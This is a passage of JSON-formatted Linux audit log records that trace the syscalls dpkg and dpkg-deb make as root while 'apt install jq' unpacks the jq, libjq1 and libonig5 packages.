"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.953:629",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7648,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40b0",
"0x7ffef7ae4170",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-deb",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.953:630",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7648,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40b0",
"0x7ffef7ae4170",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"dpkg-deb",
"--fsys-tarfile",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-deb",
"inode": 787052,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.957:631",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/",
"inode": 786436,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/bin/",
"inode": 786436,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.957:632",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/",
"inode": 786436,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.957:633",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/",
"inode": 786436,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.957:634",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808431,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:635",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1ed",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808431,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:636",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:637",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:638",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:639",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 92,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x0",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq.dpkg-new",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:640",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x1ed",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq.dpkg-new",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:641",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x41ed",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/jq.dpkg-new",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/jq",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:642",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:643",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:644",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:645",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808433,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:646",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808433,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:647",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:648",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.961:649",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
